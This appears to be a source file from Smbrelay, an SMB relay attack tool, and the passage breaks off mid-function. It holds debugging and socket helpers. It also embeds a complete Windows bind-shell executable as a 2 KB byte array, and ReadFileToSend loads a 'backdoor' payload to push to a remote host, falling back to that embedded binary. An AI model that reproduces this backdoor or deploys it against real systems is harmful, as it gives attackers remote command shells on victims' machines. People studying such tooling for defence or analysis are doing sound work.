00001 /*
00002  Misc data manipulation functions for Smbrelay
00003  Andres Tarasco
00004 */
#include "misc.h"
#include "smbrelay.h"
#ifndef WIN32
#include <unistd.h>     /* close() */
#endif
00007 
00008 extern int verbose;
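/*
 * Hex/ASCII dump of `length` bytes starting at `string`, DBG_DUMP_ROWS bytes
 * per line, e.g.
 *   0000: 4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  [ MZ.............. ]
 * A short final row is padded so the ASCII column stays aligned.  A NULL
 * pointer or a length <= 0 prints only the trailing blank line, so a failed
 * recv() result (-1) can be passed straight through by the debug callers.
 *
 * Fixes: the old partial-row branch placed its mid-row gap after the 10th
 * byte rather than the 8th, computed offsets with a literal 16 instead of
 * DBG_DUMP_ROWS, and copied the last row into a scratch buffer it never read.
 */
void DumpMem(void* string, int length) {
        const unsigned char *p = (const unsigned char *) string;
        int offset;

        if (p == NULL || length <= 0) {
                printf("\n");
                return;
        }

        for (offset = 0; offset < length; offset += DBG_DUMP_ROWS) {
                int have = length - offset;     /* bytes present in this row */
                int j;
                if (have > DBG_DUMP_ROWS) have = DBG_DUMP_ROWS;

                printf("%04x: ", (unsigned) offset);
                /* hex column; missing bytes of a short row become blanks so the
                 * ASCII column lines up, with one extra gap at mid-row */
                for (j = 0; j < DBG_DUMP_ROWS; j++) {
                        if (j < have)
                                printf("%02x ", p[offset + j]);
                        else
                                printf("   ");
                        if (j == DBG_DUMP_ROWS / 2 - 1)
                                printf(" ");
                }
                printf(" [ ");
                for (j = 0; j < DBG_DUMP_ROWS; j++) {
                        if (j >= have)
                                printf(" ");
                        else if (isprint(p[offset + j]))
                                printf("%c", p[offset + j]);
                        else
                                printf(".");
                }
                printf(" ]\n");
        }
        printf("\n");
}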
00069 
00070 
00071 
00072 
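/* Smbrelay Shell Service ( 2kb BindShell ): embedded fallback copy of the
 * payload executable, handed out when the on-disk file cannot be read.
 * Kept at file scope so it is not copied onto the stack on every call. */
static const unsigned char SMRS[2048] = {
        0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD0, 0x00, 0x00, 0x00,
        0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68,
        0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F,
        0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20,
        0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x2F, 0xB0, 0x55, 0xC4, 0x6B, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3B, 0x97,
        0x4C, 0x17, 0x46, 0x97, 0x6A, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3A, 0x97, 0x6C, 0xD1, 0x3B, 0x97,
        0xA8, 0xDE, 0x66, 0x97, 0x6E, 0xD1, 0x3B, 0x97, 0x4C, 0x17, 0x55, 0x97, 0x6A, 0xD1, 0x3B, 0x97,
        0x4C, 0x17, 0x43, 0x97, 0x6A, 0xD1, 0x3B, 0x97, 0x52, 0x69, 0x63, 0x68, 0x6B, 0xD1, 0x3B, 0x97,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x50, 0x45, 0x00, 0x00, 0x4C, 0x01, 0x02, 0x00, 0x3E, 0x48, 0xFF, 0x47, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0xE0, 0x00, 0x03, 0x01, 0x0B, 0x01, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00,
        0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
        0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
        0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x30, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x04,
        0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x5C, 0x20, 0x00, 0x00, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00,
        0x4B, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x60,
        0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0xF6, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00,
        0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x55, 0x8B, 0xEC, 0x81, 0xEC, 0xF4, 0x01, 0x00, 0x00, 0x53, 0x56, 0x57, 0x8D, 0x85, 0x0C, 0xFE,
        0xFF, 0xFF, 0x50, 0x68, 0x01, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x10, 0x20, 0x40, 0x00, 0x33, 0xF6,
        0x56, 0x56, 0x56, 0x6A, 0x06, 0x6A, 0x01, 0x6A, 0x02, 0xFF, 0x15, 0x0C, 0x20, 0x40, 0x00, 0x8B,
        0xF8, 0x6A, 0x10, 0x8D, 0x45, 0xF0, 0x50, 0x57, 0x66, 0xC7, 0x45, 0xF0, 0x02, 0x00, 0x66, 0xC7,
        0x45, 0xF2, 0x1F, 0x90, 0x89, 0x75, 0xF4, 0xFF, 0x15, 0x08, 0x20, 0x40, 0x00, 0x6A, 0x01, 0x57,
        0xFF, 0x15, 0x14, 0x20, 0x40, 0x00, 0x56, 0x8D, 0x45, 0xF0, 0x50, 0x57, 0xFF, 0x15, 0x18, 0x20,
        0x40, 0x00, 0x56, 0xBB, 0x28, 0x20, 0x40, 0x00, 0x53, 0x8B, 0xF8, 0xE8, 0x50, 0x00, 0x00, 0x00,
        0x59, 0x50, 0x53, 0x57, 0xFF, 0x15, 0x1C, 0x20, 0x40, 0x00, 0x8D, 0x45, 0x9C, 0x50, 0x8D, 0x45,
        0xAC, 0x50, 0x56, 0x56, 0x56, 0x6A, 0x01, 0x56, 0x56, 0x68, 0x24, 0x20, 0x40, 0x00, 0x56, 0xC7,
        0x45, 0xAC, 0x44, 0x00, 0x00, 0x00, 0x66, 0x89, 0x75, 0xDC, 0xC7, 0x45, 0xD8, 0x01, 0x01, 0x00,
        0x00, 0x89, 0x7D, 0xEC, 0x89, 0x7D, 0xE8, 0x89, 0x7D, 0xE4, 0x89, 0x75, 0xB8, 0x89, 0x75, 0xB4,
        0x89, 0x75, 0xE0, 0xFF, 0x15, 0x00, 0x20, 0x40, 0x00, 0x5F, 0x5E, 0x5B, 0xC9, 0xC2, 0x10, 0x00,
        0x8B, 0x4C, 0x24, 0x04, 0xF7, 0xC1, 0x03, 0x00, 0x00, 0x00, 0x74, 0x24, 0x8A, 0x01, 0x83, 0xC1,
        0x01, 0x84, 0xC0, 0x74, 0x4E, 0xF7, 0xC1, 0x03, 0x00, 0x00, 0x00, 0x75, 0xEF, 0x05, 0x00, 0x00,
        0x00, 0x00, 0x8D, 0xA4, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8D, 0xA4, 0x24, 0x00, 0x00, 0x00, 0x00,
        0x8B, 0x01, 0xBA, 0xFF, 0xFE, 0xFE, 0x7E, 0x03, 0xD0, 0x83, 0xF0, 0xFF, 0x33, 0xC2, 0x83, 0xC1,
        0x04, 0xA9, 0x00, 0x01, 0x01, 0x81, 0x74, 0xE8, 0x8B, 0x41, 0xFC, 0x84, 0xC0, 0x74, 0x32, 0x84,
        0xE4, 0x74, 0x24, 0xA9, 0x00, 0x00, 0xFF, 0x00, 0x74, 0x13, 0xA9, 0x00, 0x00, 0x00, 0xFF, 0x74,
        0x02, 0xEB, 0xCD, 0x8D, 0x41, 0xFF, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x8D, 0x41, 0xFE,
        0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x8D, 0x41, 0xFD, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1,
        0xC3, 0x8D, 0x41, 0xFC, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0xD6, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x80, 0xBC, 0x20, 0x00, 0x00,
        0x73, 0x00, 0x00, 0x80, 0x0D, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x13, 0x00, 0x00, 0x80,
        0x00, 0x00, 0x00, 0x00, 0x63, 0x6D, 0x64, 0x00, 0x53, 0x6D, 0x62, 0x52, 0x65, 0x6C, 0x61, 0x79,
        0x33, 0x20, 0x53, 0x68, 0x65, 0x6C, 0x6C, 0x20, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x20,
        0x2D, 0x20, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x74, 0x61, 0x72,
        0x61, 0x73, 0x63, 0x6F, 0x2E, 0x6F, 0x72, 0x67, 0x20, 0x0A, 0x0A, 0x00, 0xA0, 0x20, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCA, 0x20, 0x00, 0x00, 0x08, 0x20, 0x00, 0x00,
        0x98, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x20, 0x00, 0x00,
        0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD6, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x02, 0x00, 0x00, 0x80, 0xBC, 0x20, 0x00, 0x00, 0x73, 0x00, 0x00, 0x80, 0x0D, 0x00, 0x00, 0x80,
        0x01, 0x00, 0x00, 0x80, 0x13, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x57, 0x53,
        0x41, 0x53, 0x6F, 0x63, 0x6B, 0x65, 0x74, 0x41, 0x00, 0x00, 0x57, 0x53, 0x32, 0x5F, 0x33, 0x32,
        0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x00, 0x66, 0x00, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72,
        0x6F, 0x63, 0x65, 0x73, 0x73, 0x41, 0x00, 0x00, 0x4B, 0x45, 0x52, 0x4E, 0x45, 0x4C, 0x33, 0x32,
        0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

/* Return a heap copy of the embedded SMRS image and report its size through
 * *BackdoorFileSize (0 and NULL when malloc() fails). */
static char *CopyEmbeddedPayload(int *BackdoorFileSize)
{
        char *buffer = (char *)malloc(sizeof(SMRS));
        if (buffer)
                memcpy(buffer, SMRS, sizeof(SMRS));
        if (BackdoorFileSize)
                *BackdoorFileSize = buffer ? (int)sizeof(SMRS) : 0;
        return buffer;
}

/*
 * Load the executable that will be pushed to the remote host.
 *
 * lpBackdoorFile    path of the payload on disk (opened in binary mode);
 *                   NULL is treated like a missing file.
 * BackdoorFileSize  out: number of bytes in the returned buffer (may be NULL).
 *
 * Returns a malloc()'d buffer the caller owns (free() it).  If the file is
 * missing, empty, oversized for an int, or cannot be read completely, a
 * message is printed and a copy of the embedded SMRS image is returned
 * instead.  NULL is returned only when malloc() fails; *BackdoorFileSize is
 * then 0.
 *
 * Fixes: the fallback path used to return the embedded image without setting
 * *BackdoorFileSize, leaving the caller with a stale or uninitialised length;
 * ftell()/malloc()/fread() results were not checked, so a read error handed
 * back a half-filled buffer.
 */
char *ReadFileToSend(int *BackdoorFileSize,char*lpBackdoorFile)
{
        FILE *fp = NULL;
        char *buffer;
        long len = 0;

        if (BackdoorFileSize)
                *BackdoorFileSize = 0;

        if (lpBackdoorFile)
                fp = fopen(lpBackdoorFile, "rb");
        if (!fp) {
                printf("[-] %s not found. using cached version\n", lpBackdoorFile ? lpBackdoorFile : "(null)");
                return CopyEmbeddedPayload(BackdoorFileSize);
        }

        /* size the file with seek/tell; an empty file, a tell failure, or a
         * size that does not survive the int conversion all count as unreadable */
        if (fseek(fp, 0, SEEK_END) != 0 || (len = ftell(fp)) <= 0
            || (long)(int)len != len || fseek(fp, 0, SEEK_SET) != 0) {
                fclose(fp);
                printf("[-] %s unreadable. using cached version\n", lpBackdoorFile);
                return CopyEmbeddedPayload(BackdoorFileSize);
        }

        buffer = (char *)malloc((size_t)len);
        if (!buffer) {
                fclose(fp);
                return NULL;
        }
        if (fread(buffer, 1, (size_t)len, fp) != (size_t)len) {
                /* short read: never hand back a partially filled image */
                free(buffer);
                fclose(fp);
                printf("[-] %s could not be read completely. using cached version\n", lpBackdoorFile);
                return CopyEmbeddedPayload(BackdoorFileSize);
        }
        fclose(fp);
        if (BackdoorFileSize)
                *BackdoorFileSize = (int)len;
        return buffer;
}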
00223 
00224 
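/*
 * Open a TCP connection from the relay to hostname:port, waiting at most
 * CONNECT_TIMEOUT seconds, and record the peer in relay->destinationaddr and
 * relay->hostname.  hostname may be a dotted quad or a DNS name.
 *
 * Returns 1 with relay->destination connected and back in blocking mode on
 * success; 0 on resolution failure, socket() failure, timeout, or a refused
 * connection.  Once a socket has been created, every failure path closes it.
 *
 * Fixes: socket() was never checked (FD_SET on an invalid descriptor is
 * undefined); a failed or timed-out connect leaked the descriptor; and a
 * non-blocking connect that was refused was reported as success, because on
 * POSIX a refused connect also makes the socket writable and leaves the
 * error in SO_ERROR, which was never read.
 */
int ConnectToRemoteHost(RELAY *relay,char *hostname, int port)
{
        #ifdef WIN32
                u_long tmp=1;
                int soerr=0;
                int soerrlen=sizeof(soerr);
        #else
                int tmp=1;
                int soerr=0;
                socklen_t soerrlen=sizeof(soerr);
        #endif
        fd_set fds;
        struct timeval tv;
        struct hostent *hostend;
        int i;

        relay->destinationaddr.sin_family = AF_INET;
        relay->destinationaddr.sin_addr.s_addr = inet_addr(hostname);
        if (relay->destinationaddr.sin_addr.s_addr == INADDR_NONE)
        {
                /* not a dotted quad: resolve it, accepting only a 4-byte IPv4 answer */
                hostend=gethostbyname(hostname);
                if (!hostend || hostend->h_addrtype != AF_INET || hostend->h_length != 4
                    || !hostend->h_addr_list || !hostend->h_addr_list[0])
                {
                        return(0);
                }
                memcpy(&relay->destinationaddr.sin_addr.s_addr, hostend->h_addr_list[0], 4);
                printf("[+] Remote Server %s  resolved as %s\n",hostname,inet_ntoa(relay->destinationaddr.sin_addr));
        }
        /* NOTE(review): relay->hostname is declared in smbrelay.h; if it is a
         * fixed-size array this copy should be bounded to its size, as hostname
         * comes straight from the command line. */
        strcpy(relay->hostname,hostname);
        relay->destinationaddr.sin_port = htons(port); //445
        relay->destination=socket(AF_INET, SOCK_STREAM, 0);
        #ifdef WIN32
        if (relay->destination == INVALID_SOCKET) return(0);
        #else
        if ((int)relay->destination < 0) return(0);
        #endif

        /* non-blocking connect so the wait can be bounded by select() */
        #ifdef WIN32
        ioctlsocket(relay->destination, FIONBIO, &tmp);
        #else
        ioctl(relay->destination, FIONBIO, (char *)&tmp);
        #endif
        tv.tv_sec = CONNECT_TIMEOUT;
        tv.tv_usec = 0;
        FD_ZERO(&fds);
        FD_SET(relay->destination, &fds);

        connect(relay->destination,(struct sockaddr *)&relay->destinationaddr, sizeof(relay->destinationaddr));
        i=select((int)relay->destination+1,0,&fds,0,&tv);
        /* writable does not yet mean connected: read the pending socket error
         * before trusting the wake-up (a refused connect sets it on POSIX) */
        if (i>0 && getsockopt(relay->destination, SOL_SOCKET, SO_ERROR, (char *)&soerr, &soerrlen) == 0 && soerr != 0)
                i=-1;
        if (i<=0){
                printf("[-] Error - Connection against %s:%i Failed\n",hostname,port);
                #ifdef WIN32
                closesocket(relay->destination);
                #else
                close(relay->destination);
                #endif
                return(0);
        }
        /* back to blocking mode for the rest of the session */
        tmp=0;
        #ifdef WIN32
        ioctlsocket( relay->destination, FIONBIO, &tmp);
        #else
        ioctl(relay->destination, FIONBIO, (char *)&tmp);
        #endif
        return(1);
}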
00278 
00279 
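/*
 * Send nBytes from source over the connected socket and read one reply into
 * destinationBuffer (at most MaxReadSize bytes).
 *
 * timeout > 0: wait at most that many seconds for the reply.  The socket is
 * switched to non-blocking mode around select()/recv() and is always put
 * back to blocking mode before returning, including on the timeout path.
 * timeout <= 0: block indefinitely on recv().
 *
 * Returns the number of bytes received, 0 on orderly close, or -1 when the
 * send failed, the wait timed out, or recv() failed.  With debug set, the
 * request and (when one was read) the reply are hex-dumped via DumpMem().
 *
 * Fixes: send() was never checked and a partial send silently truncated the
 * request; and a timeout returned with the socket still non-blocking, so
 * every later blocking call on it failed.
 */
int SendBytesAndWaitForResponse(SOCKET destination,char *source, int nBytes, char *destinationBuffer, int MaxReadSize,int timeout)
{
        int i=-1;
        int sent=0;
        int sel;
        #ifdef WIN32
                u_long tmp=1;
        #else
                int tmp=1;
        #endif
        fd_set fds;
        struct timeval tv;

        if (debug) {
                printf("Sending..\n");
                DumpMem(source,nBytes);
        }

        /* blocking send, looped so a partial send() does not truncate the request */
        while (sent < nBytes) {
                int n = send(destination, source + sent, nBytes - sent, 0);
                if (n <= 0) return(-1);
                sent += n;
        }

        if (timeout>0)
        {
                #ifdef WIN32
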